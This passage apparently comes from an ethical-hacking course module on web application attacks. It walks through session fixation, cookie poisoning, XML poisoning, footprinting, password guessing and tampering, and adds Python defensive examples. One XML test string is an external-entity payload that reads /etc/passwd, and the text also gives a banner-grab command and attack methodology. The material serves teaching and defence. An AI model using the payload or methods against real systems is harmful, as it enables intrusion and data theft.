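    # Legitimate request built from the trusted site's own form.
    token = SESSIONS[sid]["csrf_token"]
    print(handle_transfer(cookies, {"to": "bob", "amount": "10", "csrf_token": token}))
```

The token must never be accepted from the URL or from a cookie (a cookie would be attached automatically, defeating the point), and the check belongs on every request that changes state, including those the application thinks are only reachable through its own UI. Marking the session cookie `SameSite=Lax` or `Strict` is a useful second layer in browsers that support it, not a replacement for the token.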
Web Application Denial-of-Service (DoS) Attack

Targets:
- CPU, memory, and sockets
- Disk bandwidth
- Database bandwidth
- Worker processes

Application-level DoS attacks emulate the same request syntax and network-level traffic characteristics as legitimate clients, which makes them hard to distinguish from real traffic and lets them pass DoS protection measures that only inspect the network layer.

The following issues make web applications vulnerable:
- Reasonable-use expectations (the application assumes clients behave the way its designers expected)
- Application environment bottlenecks
- Implementation flaws
- Poor data validation

Some of the common ways to perform a web application DoS attack are:
- Bandwidth consumption: flooding a network with data
Denial-of-Service (DoS) Example

Most web applications are designed to serve, or withstand, a limited number of concurrent requests. If that limit is exceeded, the web application may fail to serve the additional requests. Attackers take advantage of this to launch denial-of-service attacks on web applications: they send requests to the web application until its resources are exhausted. Once the web application has received enough requests, it stops responding to further requests even when they come from authorized users, because the attacker has swamped it with bogus requests. Various web application DoS attacks include:

Note: For complete coverage of buffer overflow concepts and techniques, refer to Module 18: Buffer Overflow

Arbitrary Code
Cookie/Session Poisoning

Cookies are used to maintain session state in the otherwise stateless HTTP protocol.

- Cookie poisoning attacks involve the modification of the contents of a cookie (personal information stored on a web user's computer) in order to bypass security mechanisms.
- Poisoning allows an attacker to inject malicious content, modify the user's online experience, and obtain unauthorized information.
- A proxy can be used for rewriting the session data, displaying the cookie data, and/or specifying a new user ID or other session identifiers in the cookie.

How Cookie Poisoning Works

Cookies are mainly used by web applications to simulate a stateful experience for each end user, and they serve as the identity presented to the server-side components of the application. A web server sets a cookie by including a Set-Cookie header in any response; the cookie is stored on the user's computer, and the browser then attaches it to every subsequent request to that server, which makes cookies the standard way of recognizing users. Cookies can also be read and modified by client-side JavaScript (unless the HttpOnly flag is set) and by an intercepting proxy. A cookie poisoning attack alters the value of a cookie on the client side before the request reaches the server: any value the application trusts without verification, such as a user ID, a role flag, or a price carried in the cookie, can be rewritten by the attacker.
Session Fixation Attacks

In a session fixation attack, the attacker tricks the user into accessing a genuine web server using an explicit session ID value. The attacker then assumes the identity of the victim and exploits his credentials at the server.

The session fixation attack procedure is explained with the help of the following diagram:

[Figure: session fixation attack. Participants: Attacker, User, bank web server.
1. The attacker sends an email containing a link with a fixed session ID: http://juggybank.com/login.jsp?sessionid=4321
2. The user clicks on the link and is redirected to the bank website.
3. The user logs in to the server using his credentials and the fixed session ID.
4. The attacker logs in to the server using the victim's credentials with the same session ID.]

FIGURE 13.26: How Cookie Poisoning Works
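Both attacks above are defeated server-side by the same two habits: treat nothing in a cookie as trustworthy unless the server can verify it, and never let a session id chosen before login survive the login. The following is an added example, not code from the module, showing a login routine that ignores any session id supplied in the URL, discards the pre-login session and issues a fresh id (session fixation), and an HMAC-signed role cookie whose tampering is detected on the next request (cookie poisoning). The server key, the in-memory session store and the cookie names are assumptions made for the example.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)  # constructed server-side secret; never sent to the client
SESSIONS = {}                         # constructed in-memory store: session id -> {"user": ...}


def sign_cookie(value: str) -> str:
    """Tamper-evident cookie value of the form '<value>.<hex mac>'.
    Changing 'user' to 'admin' without the key invalidates the MAC."""
    mac = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return f"{value}.{mac}"


def verify_cookie(signed: str):
    """Return the original value if the MAC checks out, else None (poisoned cookie)."""
    value, sep, mac = signed.rpartition(".")
    if not sep:
        return None
    expected = hmac.new(SERVER_KEY, value.encode(), hashlib.sha256).hexdigest()
    return value if hmac.compare_digest(expected, mac) else None


def login(request_cookies: dict, url_params: dict, username: str, password_ok: bool):
    """Authenticate; return the cookies the server should set, or None on failure.

    Session fixation defence: a session id supplied in the URL (?sessionid=4321)
    is never honoured, and whatever session the browser presented before login
    is discarded and replaced by a fresh id, so an id the attacker planted can
    never become the authenticated session.
    """
    if not password_ok:
        return None
    url_params.get("sessionid")  # deliberately ignored
    SESSIONS.pop(request_cookies.get("sessionid"), None)
    new_sid = secrets.token_urlsafe(32)
    SESSIONS[new_sid] = {"user": username}
    return {"sessionid": new_sid, "role": sign_cookie("user")}


def current_user(cookies: dict):
    """Resolve the request's cookies to (user, role), or None if unauthenticated or tampered."""
    session = SESSIONS.get(cookies.get("sessionid", ""))
    if session is None:
        return None
    role = verify_cookie(cookies.get("role", ""))
    if role is None:
        return None  # missing or poisoned role cookie: treat as unauthenticated
    return session["user"], role
```

Signing only makes the cookie tamper-evident; the value is still readable by the client, so anything confidential belongs on the server and the cookie should carry only an opaque session id. In practice that is the better design: keep the role in the server-side session record and sign nothing, which the example keeps as a separate signed cookie only to show how poisoning is detected.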
Insufficient Transport Layer Protection

Insufficient transport layer protection means the application supports weak algorithms or uses expired or invalid certificates. This vulnerability exposes users' data to untrusted third parties and can lead to account theft.

SSL/TLS should protect the login and every authenticated page on the website; otherwise an attacker who can monitor network traffic can steal an authenticated user's session cookie. Insufficient transport layer protection may allow untrusted third parties to obtain unauthorized access to sensitive information. The communication between the website and the client should be properly encrypted, or data can be intercepted, injected, or redirected. Account theft, phishing attacks, and compromise of administrative accounts are among the consequences once a session or connection has been compromised. Session cookies should additionally carry the Secure flag so that the browser never sends them over plain HTTP.
Improper Error Handling

- Improper error handling gives insight into source code such as logic flaws, default accounts, etc.
- Using the information received from an error message, an attacker identifies vulnerabilities.

Information gathered:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
- Application environment

[Figure: verbose error page returned by http://juggyboy.com/ with debug mode enabled:

General Error
Could not obtain post/user information
DEBUG MODE
SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145)
SELECT u.username, u.user_id, u.user_posts, u.user_from, u.user_website, u.user_email, u.user_msnm, u.user_viewemail, u.user_rank, u.user_sig, u.user_sig_bbcode_uid, u.user_allowsmile, p.*, pt.post_text, pt.post_subject, pt.bbcode_uid FROM nuke_bbposts p, nuke_users u, nuke_bbposts_text pt WHERE p.topic_id = 1547 AND pt.post_id = p.post_id AND u.user_id = p.poster_id ORDER BY p.post_time ASC LIMIT 0, 15
Line: 435
File: /user/home/geeks/www/vonage/modules/Forums/viewtopic.php

This single message reveals the database engine and its table and column names, the exact query with the user-supplied topic id inlined, the file system path and line number of the script, and the fact that a database file is missing or corrupt.]
Improper Error Handling

Improper error handling may result in various security issues for a website, especially when internal error messages such as stack traces, database dumps, and error codes are displayed to the attacker. From them an attacker can learn details such as software versions, the network layout, and the internal structure of the application. Improper error handling gives insight into source code such as logic flaws, default accounts, etc. Using the information received from an error message, an attacker identifies vulnerabilities for launching attacks. Error messages commonly reveal:
- Out of memory
- Null pointer exceptions
- System call failure
- Database unavailable
- Network timeout
- Database information
- Web application logical flow
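The fix is a single error boundary at the top of request handling that logs the detail and returns only an opaque reference to the client. The following is an added example, not code from the module: a constructed handler that fails the way the forum page on the slide did, rendered once in the improper "debug mode" style and once safely. The `view_topic` handler, the logger name and the reference-id format are assumptions made for the example.

```python
import logging
import traceback
import uuid

log = logging.getLogger("forum")


class DatabaseUnavailable(Exception):
    """Constructed stand-in for the backend failure shown on the slide."""


def view_topic(topic_id: int):
    """Constructed handler that fails the way the forum page on the slide did."""
    raise DatabaseUnavailable(
        "SQL Error: 1016 Can't open file: 'nuke_bbposts_text.MYD'. (errno: 145) "
        f"SELECT ... FROM nuke_bbposts p ... WHERE p.topic_id = {topic_id}"
    )


def _trace(exc: Exception) -> str:
    return "".join(traceback.format_exception(type(exc), exc, exc.__traceback__))


def render_error_debug(exc: Exception) -> str:
    """Improper handling: the internal message, the query and the file path reach the client."""
    return f"General Error\n{exc}\n{_trace(exc)}"


def render_error_safe(exc: Exception):
    """Proper handling: the detail is logged server-side under a reference id an
    operator can search for; the client only sees the id."""
    ref = uuid.uuid4().hex[:12]
    log.error("ref=%s %s\n%s", ref, exc, _trace(exc))
    return 500, f"Something went wrong. Reference: {ref}"


def handle_request(topic_id: int, debug_mode: bool):
    """Top-level request boundary. Returns (status, body)."""
    try:
        return 200, view_topic(topic_id)
    except Exception as exc:  # the one place unexpected errors are allowed to surface
        if debug_mode:
            return 500, render_error_debug(exc)
        return render_error_safe(exc)
```

The reference id is what makes the safe version usable in practice: support staff can still find the full trace in the log, so there is no pressure to leave debug output switched on in production. The same boundary should also turn framework default error pages (which often include version strings) into the generic response.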
Insecure Cryptographic Storage

Insecure cryptographic storage describes the state of an application in which sensitive data is stored in the database with weak or missing cryptographic protection: no encryption at all, a home-grown or obsolete algorithm, unsalted fast hashes for passwords, or keys kept next to the data they protect. An attacker who obtains the data (for example through SQL injection or a stolen backup) can then read or modify it and gain confidential and sensitive information such as credit card numbers, passwords, SSNs, and other authentication credentials, and use it for identity theft, credit card fraud, or other crimes. Developers can avoid such attacks by using proper, standard algorithms to encrypt sensitive data that must be recoverable, and by storing passwords only as salted, deliberately slow hashes, since a password never needs to be decrypted, only verified.

The following pictorial representation shows the vulnerable code that is poorly encrypted and secure code that is properly encrypted using a secure cryptographic algorithm.
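For the password case the contrast is easy to show in code. The following is an added example, not the module's own, placing the weak pattern (an unsalted MD5 digest, which a dictionary attack cracks with one cheap hash per guess and which yields identical digests for identical passwords across users) beside the fixed pattern (a per-user random salt and an iterated PBKDF2-HMAC-SHA256 derivation from the standard library, stored together with its parameters). The wordlist and the record format are constructed for the example.

```python
import hashlib
import hmac
import os

# Constructed wordlist standing in for the attacker's dictionary.
WORDLIST = ["letmein", "password", "Summer2012", "qwerty"]

PBKDF2_ITERATIONS = 600_000  # slow on purpose: raises the cost of every offline guess


def store_password_weak(password: str) -> str:
    """Insecure storage: unsalted, fast hash. Identical passwords give identical
    hashes, and a single precomputed table cracks every user at once."""
    return hashlib.md5(password.encode()).hexdigest()


def crack_weak_store(stored_md5: str, wordlist) -> str:
    """Offline dictionary attack against the weak store: one cheap hash per guess."""
    for guess in wordlist:
        if hashlib.md5(guess.encode()).hexdigest() == stored_md5:
            return guess
    return ""


def store_password_strong(password: str, salt: bytes = b"") -> str:
    """Secure storage: per-user random salt plus an iterated KDF, serialised with
    its parameters so they can be raised later without breaking old records."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return f"pbkdf2_sha256${PBKDF2_ITERATIONS}${salt.hex()}${dk.hex()}"


def verify_password_strong(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and iteration count; compare in constant time."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)
```

The salt is not a secret; its job is to make every record cost a separate attack. The iteration count is what turns a dump of the table from a minutes-long job into an infeasible one for any password that is not itself trivially guessable. Card numbers and similar data that must be read back later are a different problem: they need reversible encryption with the key held outside the database, not a hash.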
Broken Authentication and Session Management

An attacker uses vulnerabilities in the authentication or session management functions such as exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others to impersonate users.

Authentication and session management include every aspect of user authentication and managing active sessions. Even solid primary authentication often fails because of weak supporting credential functions such as password change, forgot my password, remember my password, account update, etc. Utmost care has to be taken with user authentication. Where the risk justifies it, use strong authentication methods such as software- or hardware-based cryptographic tokens or biometrics. An attacker uses vulnerabilities in the authentication or session management functions (exposed accounts, session IDs, logout, password management, timeouts, remember me, secret question, account update, and others) to impersonate users.

Session ID in URLs

Example:
http://juggyshop.com/sale/saleitems=304;jsessionid=120MTOIDPXMOOQSABGCKLHCJUN2JV?dest=NewMexico

A session identifier carried in the URL ends up in browser history, in proxy and web server logs, and in the Referer header of any outbound link the user follows, so anyone who sees the URL can take over the session.
Web Services Architecture

[Figure: web services security stack. Transport and encoding: .NET TCP Channel, Fast InfoSet, etc. Layers: WS-Work Processes; WS-Federation, WS-SecureConversation; WS-Policy, WS-Trust; WS-Security with Security Token Profiles (SAML, Kerberos, X.509); XML Encryption and XML Digital Signatures; Policy.]

- Web services evolution and its increasing use in business offer new attack vectors in an application framework.
- Web services are based on XML protocols such as Web Services Definition Language (WSDL) for describing the connection points; Universal Description, Discovery, and Integration (UDDI) for the description and discovery of web services; and Simple Object Access Protocol (SOAP) for communication between web

Web Services Attack

- An attacker is using a web service for ordering products, and injects a script to reset quantity and status on the confirmation page to less than what was originally ordered.
Web Services Footprinting Attack

[Figure: the attacker sends an XML query to the UDDI registry and receives an XML response describing the registered services.]

The UDDI data structures returned by such queries are:
- Business Entity
- Business Service
- Binding Template
- Technical Model (tModel)
Web Services XML Poisoning

- Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic.
- Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks.
- XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.

XML Request:

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>

Poisoned XML Request (the CustomerNumber and FirstName nodes are injected a second time):

<CustomerRecord>
<CustomerNumber>2010</CustomerNumber>
<FirstName>Jason</FirstName><CustomerNumber>
2010</CustomerNumber>
<FirstName>Jason</FirstName>
<LastName>Springfield</LastName>
<Address>Apt 20, 3rd Street</Address>
<Email>jason@springfield.com</Email>
<PhoneNumber>6325896325</PhoneNumber>
</CustomerRecord>
Web Services XML Poisoning

Attackers insert malicious XML code in SOAP requests to perform XML node manipulation or XML schema poisoning in order to generate errors in XML parsing logic and break execution logic. Attackers can manipulate XML external entity references that can lead to arbitrary file or TCP connection openings and can be exploited for other web service attacks. XML poisoning enables attackers to cause a denial-of-service attack and compromise confidential information.
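Defensively, a web service should parse requests against the document shape it expects rather than accept whatever the XML parser will swallow. The following is an added example, not code from the module: a strict parser for the CustomerRecord above (a subset of its fields) that refuses oversized documents, refuses any DTD before parsing (which blocks external entity references and entity-expansion bombs at once), and rejects duplicated, unknown or missing nodes like those in the poisoned request. The field list and size limit are assumptions made for the example; the standard-library `xml.etree` parser is used so it runs anywhere.

```python
import re
import xml.etree.ElementTree as ET

# Constructed requests modelled on the slide: one well-formed, two poisoned.
NORMAL_REQUEST = (
    "<CustomerRecord><CustomerNumber>2010</CustomerNumber>"
    "<FirstName>Jason</FirstName><LastName>Springfield</LastName></CustomerRecord>"
)
DUPLICATED_NODES = (
    "<CustomerRecord><CustomerNumber>2010</CustomerNumber><FirstName>Jason</FirstName>"
    "<CustomerNumber>2010</CustomerNumber><FirstName>Jason</FirstName>"
    "<LastName>Springfield</LastName></CustomerRecord>"
)
EXTERNAL_ENTITY = (
    '<!DOCTYPE CustomerRecord [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    "<CustomerRecord><CustomerNumber>&xxe;</CustomerNumber>"
    "<FirstName>Jason</FirstName><LastName>Springfield</LastName></CustomerRecord>"
)

EXPECTED_CHILDREN = ("CustomerNumber", "FirstName", "LastName")
MAX_BYTES = 64 * 1024
_DTD_MARKER = re.compile(rb"<!DOCTYPE|<!ENTITY", re.IGNORECASE)


class PoisonedXML(ValueError):
    """Raised for any request that does not match the expected document shape."""


def parse_customer_record(raw: bytes) -> dict:
    """Parse a CustomerRecord strictly; return its fields as a dict."""
    if len(raw) > MAX_BYTES:
        raise PoisonedXML("document too large (parser resource guard)")
    # Refuse any DTD outright: external entities (file/TCP access) and
    # entity-expansion bombs both need one, and a CustomerRecord never does.
    if _DTD_MARKER.search(raw):
        raise PoisonedXML("DOCTYPE/ENTITY declarations are not accepted")
    try:
        root = ET.fromstring(raw)
    except ET.ParseError as exc:
        raise PoisonedXML(f"malformed XML: {exc}") from None
    if root.tag != "CustomerRecord":
        raise PoisonedXML(f"unexpected root element {root.tag!r}")
    # Node manipulation / schema poisoning: each known child exactly once, nothing else.
    fields = {}
    for child in root:
        if child.tag not in EXPECTED_CHILDREN:
            raise PoisonedXML(f"unexpected element {child.tag!r}")
        if child.tag in fields:
            raise PoisonedXML(f"duplicate element {child.tag!r}")
        fields[child.tag] = (child.text or "").strip()
    missing = [t for t in EXPECTED_CHILDREN if t not in fields]
    if missing:
        raise PoisonedXML(f"missing elements {missing}")
    if not fields["CustomerNumber"].isdigit():
        raise PoisonedXML("CustomerNumber must be numeric")
    return fields


def is_rejected(raw: str) -> bool:
    """True if the strict parser refuses the document."""
    try:
        parse_customer_record(raw.encode())
    except PoisonedXML:
        return True
    return False
```

Rejecting the DTD by inspection before the parser sees the bytes is deliberate: it does not depend on which parser features happen to be enabled, and a SOAP body for this service has no legitimate reason to carry one. Where a service must accept DTDs, the parser itself has to be configured to forbid external entity resolution and to cap entity expansion.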
Module Flow

So far, we have discussed web application components and the various threats associated with web applications. Now we will discuss the web application hacking methodology. A hacking methodology is a systematic way to check every possible way to compromise the web application by attempting to exploit all potential vulnerabilities present in it.

Web App Hacking Methodology
In order to hack a web application, the attacker initially tries to gather as much information as possible about the web infrastructure. Footprinting is one method by which an attacker can gather valuable information about the web infrastructure or web application.

Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications.
Footprint Web Infrastructure

- Server Discovery: discover the physical servers that host the web application.
- Service Discovery: discover the services running on web servers that can be exploited as attack paths for web app hacking.
- Server Identification: grab server banners to identify the make and version of the web server software.
- Hidden Content Discovery: extract content and functionality that is not directly linked or reachable from the main visible content.
Web infrastructure footprinting is the first step in web application hacking; it helps attackers to select victims and identify vulnerable web applications. Through web infrastructure footprinting, an attacker can perform:

Server Discovery

Server discovery identifies the physical servers that host the web application and confirms that they are reachable: which hostnames resolve, to which IP addresses, and which of those addresses answer on the Internet.

Service Discovery

Service discovery finds the services listening on those servers; each exposed service is a potential attack path.

Server Identification

Grab the server banners to identify the make and version of the web server software.

Footprint Web Infrastructure: Server Discovery

- Server discovery gives information about the location of servers and ensures that the target server is alive on the Internet.
Whois Lookup Tools:

Port scanning attempts to connect to a particular set of TCP or UDP ports to find out the services that exist on the server.

Port Scanning Tools:
- Nmap
- WhatsUp PortScanner Tool
- NetScan Tools Pro
- Hping
Footprint Web Infrastructure: Server Discovery

In order to footprint a web infrastructure, first you need to discover the active servers on the Internet. Server discovery gives information about the location of active servers on the Internet. Three techniques, namely whois lookup, DNS interrogation, and port scanning, help in discovering the active servers and their associated information.

Whois Lookup

A whois lookup gathers information about a domain with the help of DNS and WHOIS queries: the registrant and administrative contacts, the name servers, and the IP addresses of the web server and DNS names. The Whois Lookup tool produces the result in the form of an HTML report. Some of the whois lookup tools are:
- http://www.whois.net

DNS Interrogation

DNS interrogation queries the Domain Name System, a distributed database that is used by varied organizations to
Footprint Web Infrastructure: Service Discovery

Port    Typical HTTP Services
80      World Wide Web standard port
81      Alternate WWW
88      Kerberos
443     SSL (https)
900     IBM WebSphere administration client
2301    Compaq Insight Manager
Footprint Web Infrastructure: Server Identification/Banner Grabbing

- Analyze the server response header field to identify the make, model, and version of the web server software.
- This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications.
- Banner grabbing tools: 1. Telnet 2. Netcat 3. ID Serve 4. Netcraft

Through banner grabbing, an attacker identifies the brand and/or version of a server, an operating system, or an application. Attackers analyze the server response header fields (chiefly Server, and often X-Powered-By or X-AspNet-Version) to identify the make, model, and version of the web server software. This information helps attackers to select the exploits from vulnerability databases to attack a web server and applications. A manual banner grab with telnet looks like this (type the HEAD line, then press Enter twice to send the blank line that ends the request):

C:\>telnet www.juggyboy.com 80
HEAD / HTTP/1.0

Banner grabbing tools:
- Telnet
- Netcat
- ID Serve
- Netcraft
Footprint Web Infrastructure: Hidden Content Discovery

- Discover the hidden content and functionality that is not reachable from the main visible content to exploit user privileges within the application.
- Techniques: web spidering and attacker-directed spidering.

Web Spidering

Web spiders automatically discover hidden content and functionality by parsing HTML forms and client-side JavaScript requests and responses.

Tools that can be used to discover hidden content by means of web spidering include:
- OWASP Zed Attack Proxy
- Burp Spider
- WebScarab
Web Spidering Using Burp Suite

Source: http://www.portswigger.net

[Figure: Burp Suite proxy history and site map showing the requests captured while browsing the target, with request headers such as Accept, User-Agent, Referer, Accept-Encoding, Accept-Language and Accept-Charset visible in the request view.]

Web spidering using Burp Suite is done in the following manner:

3. Browse the target application with JavaScript enabled and disabled, and with cookies enabled and disabled.
4. Check the site map generated by the Burp proxy, and identify any hidden application content or functions.
Web Spidering Using Mozenda Web Agent Builder

Source: http://www.mozenda.com

Mozenda Web Agent Builder crawls through a website and harvests pages of information.
Web App Hacking Methodology: Attack Web Servers

Hacking Web Servers

5. Once the attacker has identified the web server environment, he or she scans for known vulnerabilities by using a web server vulnerability scanner. Vulnerability scanning helps the attacker to launch the attack easily by identifying the exploitable vulnerabilities present on the web server. Once the attacker has gathered all the potential vulnerabilities, he or she tries to exploit them with the help of various attack techniques to compromise the web server. To stop the web server from serving legitimate users or clients, the attacker may also launch a DoS attack against it. Attacks on a vulnerable web server can be launched with the help of tools such as UrlScan, Nikto, Nessus, Acunetix Web Vulnerability Scanner, WebInspect, etc.

Web Server Hacking Tool: WebInspect

Source: https://download.hpsmartupdate.com

- WebInspect identifies security vulnerabilities in web applications.
- It runs interactive scans using a sophisticated user interface.

WebInspect is web application security assessment software designed to thoroughly analyze today's complex web applications. It delivers fast scanning capabilities, broad assessment coverage, and accurate web application scanning results. It identifies security vulnerabilities that are undetectable by traditional scanners. Attackers can exploit the identified vulnerabilities for launching web services attacks.
Web App Hacking Methodology: Analyze Web Applications

Analyzing the web application helps you identify the different vulnerable points that can be exploited by an attacker to compromise the web application. Detailed information about analyzing a web application and identifying the entry points to break into the web application will be discussed on the following slides.

- Analyze the active application's functionality and technologies in order to identify the attack surfaces that it exposes.

Analyze Web Applications

Identify Entry Points for User Input

Every place where an application accepts input is a potential entry point for attacks; these entry points include every front-end web application component that listens for HTTP requests. Review the generated HTTP requests to identify the user input entry points.

Identify Server-side Functionality

Server-side functionality refers to the code the server executes to produce the output web pages: scripts that reside on the web server and allow it to run interactive web pages or websites. Observe what the application reveals to the client (URL structure, file extensions, parameter names, error messages) to infer the server-side structure and functionality.

Identify Server-side Technologies

Server-side technologies, or server-side scripting, refer to the dynamic generation of web pages served by the web server, as opposed to static web pages that are stored on the server and served to web browsers unchanged. Fingerprint the technologies active on the server using various fingerprinting techniques such as HTTP fingerprinting.
Analyze Web Applications: Identify Entry Points for User Input
User Input
■ During the web application analysis, attackers identify entry points for user input so that they can understand the way the web application accepts or handles the user input. Then the attacker tries to find the vulnerabilities present in the input mechanism and tries to exploit them so that the attacker can associate with or gain access to the web application. Examine the URL, HTTP headers, query string parameters, POST data, and cookies to determine all user input fields.
■ Identify HTTP header parameters that can be processed by the application as user inputs, such as the User-Agent, Referer, Accept, Accept-Language, and Host headers.
■ Determine URL encoding techniques and other encryption measures implemented to secure the web traffic, such as SSL.
The tools used to analyze web applications to identify entry points for user input include Burp Suite, HttPrint, WebScarab, OWASP Zed Attack Proxy, etc.
Server-Side Technologies
[Figure: server banners and error pages that reveal the technologies in use, among them Microsoft-IIS/6.0, Apache/2.0.32 (Fedora), Sun ONE Web Server, and an ASP.NET "Server Error in '/ReportServer' Application" page listing .NET Framework version 4.0.30319 and ASP.NET version 4.0.30319.1]
Source: http://net-square.com
After identifying the entry points through user inputs, attackers try to identify server-side technologies.
The server-side technologies can be identified as follows:
1. Perform a detailed server fingerprinting, analyze HTTP headers and HTML source code to identify server-side technologies
2. Examine URLs for file extensions, directories, and other identification information
3. Examine the error page messages
4. Examine session tokens:
■ JSESSIONID - Java
■ ASPSESSIONID - IIS server
■ ASP.NET_SessionId - ASP.NET
■ PHPSESSID - PHP
Analyze Web Applications: Identify Server-side Functionality
Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications
Examine URL
Once the server-side technologies are determined, identify the server-side functionality. This helps you to find the potential vulnerabilities in server-side functionalities. Examine page source and URLs and make an educated guess to determine the internal structure and functionality of web applications.
Tools Used:
■ Wget
Source: http://www.gnu.org
■ Teleport Pro
Source: http://www.tenmax.com
Teleport Pro is an all-purpose high-speed tool for getting data from the Internet. Launch up to ten simultaneous retrieval threads, access password-protected sites, filter files by size and
Analyze Web Applications: Map the Attack Surface
■ File Upload and Download
■ Directory Traversal
■ Error Message Information Leakage
■ Display of User-Supplied Data
■ Cross-Site Scripting
■ Email Interaction
■ Email Injection
■ Redirection, Header Injection
■ Dynamic Redirects
■ Application Codes
■ Buffer Overflows
There are various entry points for attackers to compromise the network, so proper analysis of the attack surface must be done. The mapping of the attack surface includes thorough checking of possible vulnerabilities to launch the attack. The following are the various factors through which an attacker collects the information and plans the kind of attack to be launched.
Web App Hacking Methodology
Attack Authentication Mechanism
User Name Enumeration
User names can be enumerated in two ways; one is verbose failure messages and the other is predictable user names.
Verbose Failure Message
In a typical login system, the user is required to enter two pieces of information, that is, user name and password. In some cases, an application will ask for some more information. If the user is trying to log in and fails, then it can be inferred that at least one of the pieces of information provided by the user is incorrect or inconsistent with the other information provided by the user. If the application discloses which particular piece of information provided by the user was incorrect or inconsistent, it provides ground for an attacker to exploit the application.
If the login error states which part of the user name and password is not correct, guess the users of the application using the trial-and-error method
User Name Enumeration
Source: https://wordpress.com
Attackers can use an enumerated user name or predict the session identifier to bypass authentication mechanisms
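The verbose-failure weakness described above beside the uniform-response fix, as an added example that is not part of the course material. The user store, the password, PBKDF2 as the password hash and the function names are all constructed for the example.

```python
"""User name enumeration through verbose login failures, and the uniform-response fix."""
import hashlib
import hmac
import os

ITERATIONS = 20_000  # constructed; a real application uses its own password-hash settings


def _hash(password: str, salt: bytes) -> bytes:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)


# Constructed user store: user name -> (salt, password hash).
_SALT = os.urandom(16)
USERS = {"jason": (_SALT, _hash("correct horse battery", _SALT))}

# A dummy record so that an unknown user name costs the same hashing work as a
# wrong password; otherwise response time leaks what the message now hides.
_DUMMY_SALT = os.urandom(16)
_DUMMY = (_DUMMY_SALT, _hash("dummy", _DUMMY_SALT))


def login_verbose(username: str, password: str) -> str:
    """Vulnerable: the failure message says which of the two inputs was wrong."""
    if username not in USERS:
        return "Unknown user name"
    salt, digest = USERS[username]
    if not hmac.compare_digest(_hash(password, salt), digest):
        return "Incorrect password"
    return "OK"


def login_uniform(username: str, password: str) -> str:
    """Hardened: one message for every failure, and the hash is always computed."""
    salt, digest = USERS.get(username, _DUMMY)
    known = username in USERS
    matches = hmac.compare_digest(_hash(password, salt), digest)
    return "OK" if known and matches else "Invalid user name or password"


def is_enumerable(login) -> bool:
    """Review check: does an unknown name answer differently from a wrong password?"""
    return login("nosuchuser", "anything") != login("jason", "wrongpassword")


if __name__ == "__main__":
    print("verbose login enumerable:", is_enumerable(login_verbose))
    print("uniform login enumerable:", is_enumerable(login_uniform))
```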
Password Changing
Password Recovery
Remember Me Exploit
Remember Me functions are implemented using a simple persistent cookie, such as RememberUser=jason, or a persistent session identifier such as RememberUser=ABY112010.
[Figure: THC-Hydra GUI with its Target, Passwords, Tuning, Specific and Start tabs, showing the output of a run against the ftp service on port 21 of 127.0.0.1 using a user name and a password list]
Password Attacks: Password Guessing
Password guessing is a method where an attacker guesses various passwords until he or she gets the correct passwords by using the following methods: password list, password dictionary, and various tools.
Password Dictionary
Tools Used for Password Guessing
THC-Hydra
Source: http://www.thc.org
Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.
Password Attacks: Brute Forcing
Brute force is one of the methods used for cracking passwords. In a brute forcing attack, attackers crack the login passwords by trying all possible values from a set of alphabetic, numeric, and special characters. The main limitation of the brute force attack is that it is only beneficial in identifying small passwords, such as those of two characters. Guessing becomes more difficult when the password length is longer and also if it contains letters with both upper and lower case. If numbers and symbols are used, then it might even take more than a few years to guess the password, which is almost practically impossible. Commonly used password cracking tools by attackers include Burp Suite's Intruder, Brutus, Sensepost's Crowbar, etc.
Burp Suite's Intruder
Source: http://portswigger.net
Burp Intruder is a module of Burp Suite. It enables the user to automate pentesting on web applications.
Session Attacks: Session ID Prediction/Brute Forcing
Attackers can trap cookies using tools such as OWASP Zed Attack Proxy, Burp Suite, etc.
[Figure: intercepting proxy screenshot of a captured HTTP request, showing its User-Agent, Cache-Control, Accept, Referer, Accept-Encoding, Accept-Language, Accept-Charset, Cookie and Host headers]
Cookie Exploitation: Cookie Poisoning
Web App Hacking Methodology
Authorization Attack
Query String
Hidden Tags
Authorization Attack
Parameter Tampering
HTTP POST Data
POST data often is comprised of authorization and session information, since in most of the applications, the information that is provided by the client must be associated
HTTP Request Tampering
Query String Tampering
■ If the query string is visible in the address bar on the browser, the attacker can easily change the string parameter to bypass authorization mechanisms
https://juggyshop.com/books/download/852741369.pdf
https://juggybank.com/login/home.jsp?admin=true
■ Attackers can use web spidering tools such as Burp Suite to scan the web app for POST parameters
HTTP Headers
■ If the application uses the Referer header for making access control decisions, attackers can modify it to access protected application functionalities
HTTP Request Tampering
Query String Tampering
FIGURE 13.46: Query String Tampering
HTTP Headers
Source: https://www.owasp.org
Web App Hacking Methodology
Attack Session Management Mechanism
Session Management Attack
■ Session Tokens Prediction
■ Session Tokens Tampering
■ Session Hijacking
■ Session Replay
■ Man-In-The-Middle Attack
Weak Encoding Example
